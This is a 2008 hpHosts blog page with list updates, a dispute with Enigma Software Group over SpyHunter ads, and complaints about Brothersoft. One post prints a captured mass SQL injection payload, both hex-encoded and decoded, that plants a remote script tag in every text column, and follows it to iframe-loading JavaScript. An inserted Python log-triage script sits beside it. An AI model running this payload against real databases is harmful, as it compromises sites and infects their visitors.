Blog for hpHosts, and whatever else I feel like writing about ....

Sunday 31 August 2008

Enigma Software Group: Tracking the Hunter Part 2

I recently spoke with Alvin, CEO of ESG, and he also assured me that ESG dropped the affiliates that were involved in the spamming, always a good thing (whether or not they've re-registered as affiliates is anyone's guess - the internet provides a good enough level of anonymity for spammers, so it will be up to ESG to monitor their affiliates, and of course, whilst we certainly shouldn't be policing companies' affiliates, if we report those we do find doing wrong, we can also help).

View the full article;
http://mysteryfcm.co.uk/?mode=Articles&date=31-08-2008

Monday 25 August 2008

hpHOSTS - UPDATED August 26th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 54,010 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 26/08/2008 11:12
  2. Last Verified: 26/08/2008 10:30
Download hpHosts now!
http://hosts-file.net/?s=Download

Sunday 24 August 2008

Exploit efforts increased ......

You know you're doing something right when they ramp up their efforts.

I've been seeing these attacks for quite some time now, and they're getting ever more persistent, with the attacks more than doubling within the past few days. The exploit attempts show in the server log as;

2008-08-23 18:32:23 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C
40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534
F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A
6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F
7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F
437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F
2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E
20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F
7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2
F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D
20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C
736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F
772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D
20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F
437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC
(@S); 80 - 58.61.134.162 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1
;+InfoPath.1) - mysteryfcm.co.uk 200 0 0


Previously these attacks were aimed more toward the hpHosts server. Now however, they're aimed at all of the servers on the network, guess I'm annoying the right people???.

The above CAST string is Hex encoded, and decodes to;

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
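
A defender-side way to triage log entries like the one above, as an added example that is not from the original post: it finds the hex-encoded CAST wrapper in a log line, decodes it, and lists the script URLs the injection would plant (defanged). The sample line, the example.invalid hostnames, the 192.0.2.x address and the field position of the client IP are constructed assumptions; the NVARCHAR (UTF-16) handling goes beyond the single CHAR case shown in the post.

```python
import re
from urllib.parse import unquote

# CAST(0x<hex> AS CHAR/VARCHAR/NCHAR/NVARCHAR ...) as it appears once the
# request has been URL-decoded.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.I)
SCRIPT_SRC = re.compile(r"<script\s+src\s*=\s*[\"']?([^\"'\s>]+)", re.I)
CLIENT_IP_FIELD = 7  # assumption: same field order as the log entry shown above


def decode_hex_payload(hex_digits):
    """Turn the hex literal back into the SQL text it encodes."""
    # Tolerate an entry that was cut off mid-byte by dropping the odd nibble.
    hex_digits = hex_digits[: len(hex_digits) // 2 * 2]
    raw = bytes.fromhex(hex_digits)
    # NVARCHAR payloads are UTF-16LE: every second byte of ASCII text is 0.
    if raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def defang(url):
    """Make a URL non-clickable for reports (http -> hxxp)."""
    return url.replace("http", "hxxp", 1)


def analyse(log_line):
    """Return one finding per hex-encoded CAST payload found in a log line."""
    fields = log_line.split()
    client_ip = fields[CLIENT_IP_FIELD] if len(fields) > CLIENT_IP_FIELD else None
    findings = []
    for match in CAST_HEX.finditer(unquote(log_line)):
        sql = decode_hex_payload(match.group(1))
        urls = list(dict.fromkeys(SCRIPT_SRC.findall(sql)))  # dedupe, keep order
        findings.append({
            "client_ip": client_ip,
            "sql": sql,
            "script_urls": [defang(u) for u in urls],
        })
    return findings


def build_sample_line(encoding="ascii", sql_type="CHAR"):
    """Constructed log line (not a real capture) in the shape shown above."""
    sql = ("DECLARE @T varchar(255) exec('update [t] set [c]=''<script "
           "src=\"http://payload.example.invalid/w.js\"></script>''')")
    hexed = sql.encode(encoding).hex().upper()
    query = (";DECLARE%20@S%20" + sql_type + "(4000);SET%20@S=CAST(0x" + hexed
             + "%20AS%20" + sql_type + "(4000));EXEC(@S);")
    return ("2008-08-23 18:32:23 GET /page.asp " + query
            + " 80 - 192.0.2.10 Mozilla/4.0+(compatible) - www.example.invalid 200 0 0")


if __name__ == "__main__":
    for finding in analyse(build_sample_line()):
        print(finding["client_ip"], finding["script_urls"])
        print(finding["sql"])
```
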


This then loads;

*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://www0.douhunqn.cn/csrss/w.js
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 24 August 2008
Time: 16:30:54:30
*****************************************************************
window.onerror=function()
{
document.write("<iframe width=0 height=0 src=hxxp://www0.douhunqn.cn/csrss/new.htm></iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=hxxp://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');


document.write("<iframe width=0 height=0 src=hxxp://www0.douhunqn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Which loads;

*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://www0.douhunqn.cn/csrss/new.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 5
Date: 24 August 2008
Time: 16:31:27:31
*****************************************************************
<script src='hxxp://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="hxxp://js.users.51.la/2094465.js"></script>


s96.cnzz.com is using FastFlux and loads;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://s96.cnzz.com/stat.php?id=1019605&web_id=1019605
Server IP: 219.232.241.133 [ Resolution failed ]
    > 219.232.241.136 [ Resolution failed ]
    > 219.232.241.139 [ Resolution failed ]
    > 219.232.241.141 [ Resolution failed ]
    > 219.232.241.143 [ Resolution failed ]
    > 219.232.241.144 [ Resolution failed ]
    > 219.232.241.145 [ Resolution failed ]
    > 219.232.243.4 [ Resolution failed ]
    > 219.232.243.5 [ Resolution failed ]
    > 219.232.243.6 [ Resolution failed ]
    > 219.232.243.7 [ Resolution failed ]
    > 219.232.243.8 [ Resolution failed ]
    > 219.232.243.9 [ Resolution failed ]
    > 219.232.243.10 [ Resolution failed ]
    > 219.232.243.55 [ Resolution failed ]
    > 219.232.243.56 [ Resolution failed ]
    > 219.232.241.132 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 24 August 2008
Time: 16:39:34:39
*****************************************************************
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.42642600 1219592199';
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="hxxp://www.cnzz.com/stat/website.php?web_id=1019605" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="hxxp://222.77.187.203/stat.htm?id=1019605'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";

Server maintenance

This is a quick note to let you all know that in 11 hours (approx 23:00 GMT), the gateway will be taken offline for maintenance. This is to allow more stringent filters to be put in place, and a move from Windows to Linux, due to the abnormal amount of traffic increasing and thus, overloading the server.

A backup server will be put in place to minimize the downtime. Affected sites include;

*.hosts-file.net
*.mysteryfcm.co.uk
*.fspamlist.com

Thursday 21 August 2008

Enigma Software Group removed from hpHosts

As a quick note prior to my next article, I'd like to announce the removal of Enigma Software Group from the hpHosts database.

ESG were listed with the FSA (Fraudulent Security Application) classification. However, my recent testing of SpyHunter, coupled with my research into their current practices, have shown they no longer fit the inclusion criteria. ESG have cleaned house, concerning the issues raised in last year's article, and have further modified their adverts to prevent confusion.

ESG could have just gone on the offensive and threatened to sue all and sundry, but instead, they've worked to resolve issues, and build relationships instead of destroying them further. This is always a good thing, for the security community as a whole, and more importantly - for you, the user.

Wednesday 20 August 2008

Enigma Software Group - SpyHunter and Misleading adverts

I re-tested SpyHunter (see references) an hour or two ago, and am pleased to say, the rogue behaviours I previously witnessed are all but gone - the only problems with the actual program itself that I have now are;

1. It still requires payment to remove cookies
2. It still does not come with a fully functional trial

However, as I mentioned to Alvin (CEO, Enigma Software Group), I DO have a major problem with ESG themselves, or rather, their misleading advertising practices.

Rather than re-hash it, I'll simply repeat what I sent to Alvin concerning the issue;
Whilst SH itself seems to be no longer presenting with rogue behaviour, I DO still have concerns over ESG's practices, namely the advertising practices. An example of this is;

http://www.google.co.uk/search?hl=en&q=remove+virusheal&meta=

In the right column, there's an advert which claims to lead to "www{DOT}virusheal-removal.com". This is misleading as it actually leads to "www{DOT}virusheal-removal.com.removal-instructions.com/removeVirusHeal.html".

Screenshot:
http://temp.it-mate.co.uk/imgGoogleAdvert_-_EnigmaSoftwareGroup.gif

On top of this is the advert itself;

"Remove VirusHeal (Free)
How to Remove VirusHeal.
VirusHeal Removal Instructions."

We all know the "(Free)" isn't actually free - it requires payment for SH (yep, there may be manual instructions, but that’s not mentioned in the advert, so is irrelevant).

Though just one example, it's not isolated to the specific keywords I used for this example - ESG need to resolve this and cease using these practices.

/edit

Since publishing this, I've had a response from Alvin on my concerns. Firstly concerning the cookies;
You are entitled to your opinion on this point, I concede that giving cookie
deletion for FREE is reasonable because they are quite harmless, but the
issue is my larger commercial competitors: PCTools, Webroot, Alluria, etc...
Since they are all "pay to remove" cookies, files, and registry entries, and
I know you are aware of this fact. I have to be as competitive as they are.
However, I am open to the idea of removing cookies for free. I have to admit
that is an interesting point....

If SH changes to remove cookies for free, then that's great.

Secondly, on the Google adverts, Alvin advised me that Google has a length restriction on the URL that's placed on the part I mentioned, which explains why it displays as it does. However, in response to this, I've advised that a better option would be to have the main hostname there, instead of the sub-domain part (i.e. removal-instructions.com instead of infection.com). He's also advised me that he's ordered his marketing manager to remove the word "free" from the adverts. Definitely a good step.

His response to the adverts was rather lengthy to be placed here, so I've posted the abridged version instead;
Steven, in all honesty, the Google PPC backend has a display URL character
limit, so it is a major pain in the behind to have a descriptive sub-domain.
This is not done for any deceptive or malicious reason. This is done so we
can be as descriptive as possible. Have you ever conducted paid campaigns on
Google? You will see what I mean... That bottom field is mandatory... In
fact, it is a useless field. I would rather they get rid of it and allow
more room to be more descriptive on paid ads.

..... snipped
2. On top of this is the advert itself;

"Remove VirusHeal (Free)
How to Remove VirusHeal.
VirusHeal Removal Instructions."

We all know the "(Free)" isn't actually free - it requires payment for SH
(yep, there may be manual instructions, but that's not mentioned in the
advert, so is irrelevant).


I agree with you on this statement. To say free manual instructions in the
description makes more sense, but I do not want to see the terms "FREE &
REMOVE" on the ad. As you said, it is irrelevant.

This would have been as effective:

Remove VirusHeal
How to Remove VirusHeal.
VirusHeal Removal Instructions

(If it looks a bit weird still, again there is a character restriction per
line on Google Adwords)

I officially ordered my Adwords manager to remove any reference of the word
FREE, so do not go crazy on me if it takes a few days ;) OK? Since it is a
manual task, and the Google Adwords interface is clunky, so bear with me and
then review the changes.

Again, I agree with you on this point, since having the term "FREE" on that
ad is not a value added term for converting customers any way.



References

Enigma Software Group: Tracking the Hunter
http://mysteryfcm.co.uk/?mode=Articles&date=26-04-2007

Tuesday 19 August 2008

Brothersoft gives an example of how best to annoy me ..

Alas annoying me isn't an easy thing to do, I'm a very patient and normally placid person, but as with everyone else - some things just get my goat, and Brothersoft is one of those things.

Long story short, I've been receiving e-mails from them for some time now, that contain;
Hello [ ] [ ]:

In order to prevent unauthorized sign-ups, we want you to confirm your registration request. Verification will allow you to access site features and information only available with registration.

Please confirm your registration by click the link:
hxxp://author.brothersoft.com/?act=Register.reg_confirm&user_name=support@support.it-mate.co.uk&vcode=16553e3a418f02ecdac3a932ade3ef21

Please do not reply to this message, as no recipient has been designated. Replying to this message will not confirm your registration.

Note: If you experience problems with the provided link, simply copy and paste the link above into the address field within your browser.

BrotherSoft Team
hxxp://www.brothersoft.com

Needless to say, I've sent them numerous e-mails telling them I neither requested nor want the account. Most of those times, my e-mails have gone unanswered, sometimes I've gotten a reply such as;
OK,removed.Please come back and check.


2008-07-24
________________________________

support_staff

My last e-mail to them however, resulted in their sending me the following;
Hello:
Sorry to inform you your account has been disabled by Brothersoft because of rule infringement.
In this period, you couldn't submit or manage your software.
If any problem or question, please feel free to contact us.

BrotherSoft Team
hxxp//www.brothersoft.com

Oh dear, they've sent me an e-mail telling me my account has been blocked for rule infringement, fantastic - but I DID NOT ASK FOR THE DAMN ACCOUNT TO BEGIN WITH!!!.

Saturday 16 August 2008

Abnormally high traffic

Alas there is still abnormally high traffic on the hpHosts server. I've been keeping an eye on the server logs over the past few months, and it is apparent that it's either due to HostsMan users sending extremely frequent requests (as mentioned previously) OR lots of people faking the HostsMan user agent (I spoke to HM's developer some time ago and he pondered whether it could be someone faking the UA as well).

I'm having the server + gateway re-booted as I write this, and will go through the logs once I've got RD access again.

On the plus side, I've also spoken to the developer of WK (the filter I implemented for the server) and he's advised me on how to resolve the access issues for Free Download Manager users. I'll be sorting this out tomorrow.

Tuesday 12 August 2008

Server filter still causing access problems .....

It seems the filter I implemented, is still causing access problems, this time for those using Free Download Manager (I'll refrain from re-publishing my disdain for this program here - see the forums for the story).

I am working on resolving this, and have actually removed the filter match that was supposed to be causing it (basing it on the log files anyway). However, in the meantime, those using FDM that are unable to access either the forums or the website, can download the hphosts file from the alternate mirrors below;

hosts.txt

http://www.it-mate.co.uk/downloads/hosts.txt
http://support.it-mate.co.uk/downloads/hosts.txt
http://freeware.it-mate.co.uk/downloads/hosts.txt
http://avant.it-mate.co.uk/dl/Tools/hpHosts/hosts.txt

Windows (ZIP) (also suitable for Linux)

http://it-mate.co.uk/downloads/hphosts.zip
http://support.it-mate.co.uk/downloads/hphosts.zip
http://freeware.it-mate.co.uk/downloads/hphosts.zip
http://avant.it-mate.co.uk/dl/Tools/hpHosts/hosts.zip
http://downloads.securitycadets.com/hosts.zip (Courtesy Security Cadets)

Windows (Setup)

http://it-mate.co.uk/downloads/hpHosts-Setup-Win32.exe
http://support.it-mate.co.uk/downloads/hpHosts-Setup-Win32.exe
http://freeware.it-mate.co.uk/downloads/hpHosts-Setup-Win32.exe
http://avant.it-mate.co.uk/dl/Tools/hpHosts/hpHosts-Setup-Win32.exe
http://downloads.securitycadets.com/hpHosts-Setup-Win32.exe (Courtesy Security Cadets)

Macintosh

http://it-mate.co.uk/downloads/mac_hosts.zip
http://support.it-mate.co.uk/downloads/mac_hosts.zip
http://freeware.it-mate.co.uk/downloads/mac_hosts.zip
http://avant.it-mate.co.uk/dl/Tools/hpHosts/mac_hosts.zip

If you would like to provide an additional mirror, please get in touch

hpHOSTS - UPDATED August 13th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,668 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 13/08/2008 03:30

  2. Last Verified: 13/08/2008 03:45

Download hpHosts now!
http://hosts-file.net/?s=Download

HOSTS files, IP blacklists, toolbars - is it enough?

Back in 2006, I wrote an article on the HOSTS file, and how it added an improvement to the security of your computer. Whilst this has not changed, the malware scene has and thus, the security needed to protect your computer, has changed drastically.

HOSTS files

A HOSTS file has never been enough on its own to protect you, simply because it is far too easy for a malicious program (and depending on your browser settings, a malicious webpage) to completely change or remove, the HOSTS file in seconds, and it is limited to blocking individual hostnames only (it cannot for example, do a wildcard block such as *.badsite.com, and it cannot block IP addresses). Obviously this requires you have a program monitoring the file for changes, such as WinPatrol. So what else is needed?

Announcement & Comments:
http://forum.hosts-file.net/viewtopic.php?f=37&t=657

Full article published at:
http://mysteryfcm.co.uk/?mode=Articles&date=12-08-2008

Monday 11 August 2008

Bah, another Blogspot problem ......

Yep, I've noticed another problem with this blog - I've got it set to pull the latest additions to hpHosts, and for some reason, it's not realised that there's been additions today - it still thinks the last 5 additions were;

wbdigi.com - 10-Aug-2008
ia-support.com - 10-Aug-2008
ia-payment.com - 10-Aug-2008
ia-license.com - 10-Aug-2008
scanner.ia-scanner.com - 10-Aug-2008

.... but nope, the last 5 additions were actually;

1 adserver.zylom.com 194.165.35.109 ATS
2 89-149-194-33.internetserviceteam.com 89.149.194.33 PSH
3 www.winprotector.net 77.91.225.234 FSA
4 winprotector.net 77.91.225.234 FSA
5 www.pidosoftware.com 67.205.75.9 FSA

/edit

Yeah - I publish this and the damn thing updates itself, and still incorrectly ....... wtf? and why is it still saying the 10th?

adserver.zylom.com - 10-Aug-2008
89-149-194-33.internetserviceteam.com - 10-Aug-2008
winprotector.net - 10-Aug-2008
pidosoftware.com - 10-Aug-2008
alfa-kom.ru - 10-Aug-2008

Thursday 7 August 2008

vURL Desktop Edition

v0.3.3

Changes:

Added: Detect all IP's that a hostname resolves to (including rDNS for those IP's)

Modified: Source button now enabled when clicking to view application log before dissecting site
Modified: Redesigned settings dialog
Modified: Various other modifications

There's also a new change on the Links tab, but I'll let you guys see if you can tell what it is

http://support.it-mate.co.uk/?mode=Products&act=DL&p=vurldesktopedition

Wednesday 6 August 2008

New hpHosts release

hpHOSTS - UPDATED August 6th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,525 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

  1. Latest Updated: 06/08/2008 18:30

  2. Last Verified: 06/08/2008 18:15

Download hpHosts now!
http://hosts-file.net/?s=Download

Tuesday 5 August 2008

First post .....

Well, I finally got round to creating this, and still don't know if I'll be keeping it.

Anywho, until I decide whether to go with this - or just create a blog myself, then err, welcome hehe.